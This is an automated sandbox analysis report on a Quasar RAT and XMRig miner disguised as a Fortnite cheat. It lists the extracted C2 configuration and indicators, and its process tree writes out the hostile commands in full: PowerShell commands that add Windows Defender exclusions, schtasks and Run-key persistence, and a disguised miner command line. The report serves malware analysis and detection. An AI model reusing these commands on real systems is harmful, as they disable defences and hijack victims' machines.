quasar | a9a90a7ba273affb69647f2eabb614e4dcd2c6acbb82c2b1bb3cb4b936e5fffe

Analysis

max time kernel
145s
max time network
146s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
21-12-2024 18:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FortniteExternal.exe
Size

39KB
MD5

cffb27bf1ba05391482df627dc8504e4
SHA1

c7deb87c21a1bb2b97e3ded00edf56578acf3aac
SHA256

a9a90a7ba273affb69647f2eabb614e4dcd2c6acbb82c2b1bb3cb4b936e5fffe
SHA512

9132d00fadc97bca3a6246f86bfc745d18227928ecd8a66e2495e788ce628df41b3eaf5270a25f2c7818aef41765a18a3ecb09c2aed3ac47d9d02894098ac1ee
SSDEEP

768:xldEjfYrbTQA+mzUMDmNwS9yVSErxnXneI6zDf9BQj0/nyc3v:xld8mzJmPqSExgzDft/nFv

Score

10^/10

quasar xmrig runtime broker execution miner persistence spyware trojan upx

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Runtime Broker

92.221.125.55:49868

Mutex

73f0bf3a-83f3-424b-b7a1-a8200df3e317

Attributes

encryption_key
5CB2755608EFDB1313EF4F2ACEA101833F5AEE2B
install_name
Runtime Broker.exe
log_directory
Logs
reconnect_delay
100
startup_key
System
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral1/files/0x00060000000194d2-31.dat	family_quasar
behavioral1/memory/620-48-0x00000000009F0000-0x0000000000D14000-memory.dmp	family_quasar
behavioral1/memory/1824-63-0x0000000000220000-0x0000000000544000-memory.dmp	family_quasar

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral1/memory/1480-95-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-103-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-120-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-119-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-118-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-117-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-105-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-116-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-113-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-109-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-107-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-101-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-99-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-97-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-93-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-112-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1480-121-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2896	powershell.exe
1600	powershell.exe
820	powershell.exe
2256	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 8 IoCs

pid	Process
2712	cm2.exe
620	qcmq3.exe
1824	Runtime Broker.exe
2988	services64.exe
264	sihost64.exe
1504	SW-Spoofer1.exe
1776	SW-Spoofer1.exe
1396	Process not Found

Loads dropped DLL 13 IoCs

pid	Process
2128	FortniteExternal.exe
1732	cmd.exe
936	conhost.exe
2128	FortniteExternal.exe
1504	SW-Spoofer1.exe
1776	SW-Spoofer1.exe
1776	SW-Spoofer1.exe
1776	SW-Spoofer1.exe
1776	SW-Spoofer1.exe
1776	SW-Spoofer1.exe
1776	SW-Spoofer1.exe
1776	SW-Spoofer1.exe
1396	Process not Found

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Update = "C:\\Windows\\system32\\FortniteExternal.exe"	FortniteExternal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows System Update = "C:\\Windows\\system32\\FortniteExternal.exe"	FortniteExternal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Update = "C:\\Windows\\system32\\FortniteExternal.exe"	FortniteExternal.exe

Drops file in System32 directory 15 IoCs

description	ioc	Process
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\SubDir\Runtime Broker.exe	Runtime Broker.exe
File created	C:\Windows\system32\SubDir\Runtime Broker.exe	qcmq3.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\FortniteExternal.exe	FortniteExternal.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\SubDir\Runtime Broker.exe	qcmq3.exe
File opened for modification	C:\Windows\system32\SubDir	qcmq3.exe
File opened for modification	C:\Windows\system32\SubDir	Runtime Broker.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File created	C:\Windows\system32\FortniteExternal.exe	FortniteExternal.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 936 set thread context of 1480	936	conhost.exe	56

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00030000000209db-938.dat	upx
behavioral1/memory/1776-940-0x000007FEEB350000-0x000007FEEB9B5000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	FortniteExternal.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	FortniteExternal.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	FortniteExternal.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	FortniteExternal.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2040	schtasks.exe
2904	schtasks.exe
1704	schtasks.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
2760	conhost.exe
2896	powershell.exe
1600	powershell.exe
936	conhost.exe
936	conhost.exe
820	powershell.exe
1480	notepad.exe
2256	powershell.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe
1480	notepad.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	conhost.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	620	qcmq3.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	1824	Runtime Broker.exe
Token: SeDebugPrivilege	936	conhost.exe
Token: SeDebugPrivilege	820	powershell.exe
Token: SeLockMemoryPrivilege	1480	notepad.exe
Token: SeLockMemoryPrivilege	1480	notepad.exe
Token: SeDebugPrivilege	2256	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1824	Runtime Broker.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1824	Runtime Broker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1824	Runtime Broker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 2712	2128	FortniteExternal.exe	30
PID 2128 wrote to memory of 2712	2128	FortniteExternal.exe	30
PID 2128 wrote to memory of 2712	2128	FortniteExternal.exe	30
PID 2712 wrote to memory of 2760	2712	cm2.exe	32
PID 2712 wrote to memory of 2760	2712	cm2.exe	32
PID 2712 wrote to memory of 2760	2712	cm2.exe	32
PID 2712 wrote to memory of 2760	2712	cm2.exe	32
PID 2760 wrote to memory of 2664	2760	conhost.exe	33
PID 2760 wrote to memory of 2664	2760	conhost.exe	33
PID 2760 wrote to memory of 2664	2760	conhost.exe	33
PID 2128 wrote to memory of 620	2128	FortniteExternal.exe	36
PID 2128 wrote to memory of 620	2128	FortniteExternal.exe	36
PID 2128 wrote to memory of 620	2128	FortniteExternal.exe	36
PID 2664 wrote to memory of 2896	2664	cmd.exe	37
PID 2664 wrote to memory of 2896	2664	cmd.exe	37
PID 2664 wrote to memory of 2896	2664	cmd.exe	37
PID 2760 wrote to memory of 1340	2760	conhost.exe	38
PID 2760 wrote to memory of 1340	2760	conhost.exe	38
PID 2760 wrote to memory of 1340	2760	conhost.exe	38
PID 1340 wrote to memory of 2040	1340	cmd.exe	40
PID 1340 wrote to memory of 2040	1340	cmd.exe	40
PID 1340 wrote to memory of 2040	1340	cmd.exe	40
PID 2664 wrote to memory of 1600	2664	cmd.exe	41
PID 2664 wrote to memory of 1600	2664	cmd.exe	41
PID 2664 wrote to memory of 1600	2664	cmd.exe	41
PID 620 wrote to memory of 2904	620	qcmq3.exe	42
PID 620 wrote to memory of 2904	620	qcmq3.exe	42
PID 620 wrote to memory of 2904	620	qcmq3.exe	42
PID 620 wrote to memory of 1824	620	qcmq3.exe	44
PID 620 wrote to memory of 1824	620	qcmq3.exe	44
PID 620 wrote to memory of 1824	620	qcmq3.exe	44
PID 1824 wrote to memory of 1704	1824	Runtime Broker.exe	45
PID 1824 wrote to memory of 1704	1824	Runtime Broker.exe	45
PID 1824 wrote to memory of 1704	1824	Runtime Broker.exe	45
PID 2760 wrote to memory of 1732	2760	conhost.exe	47
PID 2760 wrote to memory of 1732	2760	conhost.exe	47
PID 2760 wrote to memory of 1732	2760	conhost.exe	47
PID 1732 wrote to memory of 2988	1732	cmd.exe	49
PID 1732 wrote to memory of 2988	1732	cmd.exe	49
PID 1732 wrote to memory of 2988	1732	cmd.exe	49
PID 2128 wrote to memory of 2252	2128	FortniteExternal.exe	50
PID 2128 wrote to memory of 2252	2128	FortniteExternal.exe	50
PID 2128 wrote to memory of 2252	2128	FortniteExternal.exe	50
PID 2988 wrote to memory of 936	2988	services64.exe	51
PID 2988 wrote to memory of 936	2988	services64.exe	51
PID 2988 wrote to memory of 936	2988	services64.exe	51
PID 2988 wrote to memory of 936	2988	services64.exe	51
PID 936 wrote to memory of 3036	936	conhost.exe	52
PID 936 wrote to memory of 3036	936	conhost.exe	52
PID 936 wrote to memory of 3036	936	conhost.exe	52
PID 3036 wrote to memory of 820	3036	cmd.exe	54
PID 3036 wrote to memory of 820	3036	cmd.exe	54
PID 3036 wrote to memory of 820	3036	cmd.exe	54
PID 936 wrote to memory of 264	936	conhost.exe	55
PID 936 wrote to memory of 264	936	conhost.exe	55
PID 936 wrote to memory of 264	936	conhost.exe	55
PID 936 wrote to memory of 1480	936	conhost.exe	56
PID 936 wrote to memory of 1480	936	conhost.exe	56
PID 936 wrote to memory of 1480	936	conhost.exe	56
PID 936 wrote to memory of 1480	936	conhost.exe	56
PID 936 wrote to memory of 1480	936	conhost.exe	56
PID 936 wrote to memory of 1480	936	conhost.exe	56
PID 936 wrote to memory of 1480	936	conhost.exe	56
PID 936 wrote to memory of 1480	936	conhost.exe	56

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\FortniteExternal.exe
"C:\Users\Admin\AppData\Local\Temp\FortniteExternal.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Users\Admin\AppData\Local\Temp\cm2.exe
  "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2664
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1340
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2040
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Windows\system32\services64.exe"
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1732
    - - C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2988
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        6⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:936
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2256
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:264
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:2728
        
        C:\Windows\System32\notepad.exe
        
        C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=88SnrVgESxo4oqDueYzTEcYaJJR5sQpBAJwk5bMuskEg9jWfT5X5eYvhdPu8vWPBV1Tqbx31GitQURNLmvKkBtH5QsY6dN3 --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1480
- C:\Users\Admin\AppData\Local\Temp\qcmq3.exe
  "C:\Users\Admin\AppData\Local\Temp\qcmq3.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\system32\schtasks.exe
    "schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Runtime Broker.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2904
- - C:\Windows\system32\SubDir\Runtime Broker.exe
    "C:\Windows\system32\SubDir\Runtime Broker.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1824
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Runtime Broker.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:864
- C:\Users\Admin\AppData\Local\Temp\SW-Spoofer1.exe
  "C:\Users\Admin\AppData\Local\Temp\SW-Spoofer1.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1504
- - C:\Users\Admin\AppData\Local\Temp\SW-Spoofer1.exe
    "C:\Users\Admin\AppData\Local\Temp\SW-Spoofer1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
517eb9e2cb671ae49f99173d7f7ce43f

SHA1
4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

SHA256
57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

SHA512
492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15042\python313.dll

Filesize
1.8MB

MD5
1490ed147cdd2c2fb09259d2b6c42161

SHA1
11c639b79b11d6c6d2a5910e602b199e8c63fffe

SHA256
c47c6432c0c202e885b344a18dcb4e392999c9a78eb987720b48e0fcff2e6a61

SHA512
1f086ab3e2029ad450a9be92d3e367342b6eed52e7581647e7b88596a1cbee1d9b478c41ce956396e4056974f1f3fe148192828bad3613ab58ed2c3e758b8a03

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15042\ucrtbase.dll

Filesize
992KB

MD5
0e0bac3d1dcc1833eae4e3e4cf83c4ef

SHA1
4189f4459c54e69c6d3155a82524bda7549a75a6

SHA256
8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

SHA512
a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

Download Submit
